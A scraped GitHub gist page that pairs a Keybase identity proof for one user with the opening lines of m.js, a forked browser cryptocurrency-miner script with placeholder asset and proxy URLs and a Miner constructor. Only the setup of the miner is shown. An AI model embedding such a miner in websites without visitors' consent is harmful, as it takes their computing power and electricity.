Skip to content

Instantly share code, notes, and snippets.

Keybase proof

I hereby claim:

  • I am amittell on github.
  • I am alexm (https://keybase.io/alexm) on keybase.
  • I have a public key whose fingerprint is C936 0EF9 5F27 8D80 96CC 12C4 64BD C3AB 57DB 7F2F

To claim this, I am signing this object:

@amittell
amittell / m.js
Created December 14, 2017 04:42 — forked from cazala/m.js
var libUrl = 'YOUR_ASSET_URL';
const proxyUrl = 'YOUR_PROXY';
(function(window) {
"use strict";
var Miner = function(siteKey, params) {
this.params = params || {};
this._siteKey = siteKey;
this._user = null;
this._threads = [];